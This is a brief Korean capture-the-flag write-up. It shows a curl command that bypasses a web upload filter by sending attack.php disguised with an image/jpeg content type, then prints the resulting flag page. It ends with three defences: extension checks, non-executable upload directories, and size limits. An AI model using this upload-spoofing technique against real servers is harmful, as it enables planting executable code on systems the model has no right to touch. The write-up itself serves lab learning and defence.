악성 파일을 서버에 업로드해 해킹할 수 있다.
attack.php를 type=image/jpeg로 위장해 업로드할 수 있다.

ip="http://<ip-address>"
curl -o result.html -X POST
-F ’Upload=Upload’
-F ’uploaded=@attack.php;type=image/jpeg’
"$ip/?page=upload"

<pre><center><h2 style="margin-top:50px;">The flag is : 46910d9ce35b385885a9f7e2b336249d622f29b267a1771fbacf52133beddba8</h2><br/><img src="images/win.png" alt="" width=200px height=200px></center> </pre><pre>/tmp/attack.php succesfully uploaded.</pre>

파일 확장자명 검사
업로드된 디렉터리가 실행 권한을 가지지 않도록 설정한다.
파일 사이즈를 제한해 악성 프로그램을 업로드하지 못하도록 한다.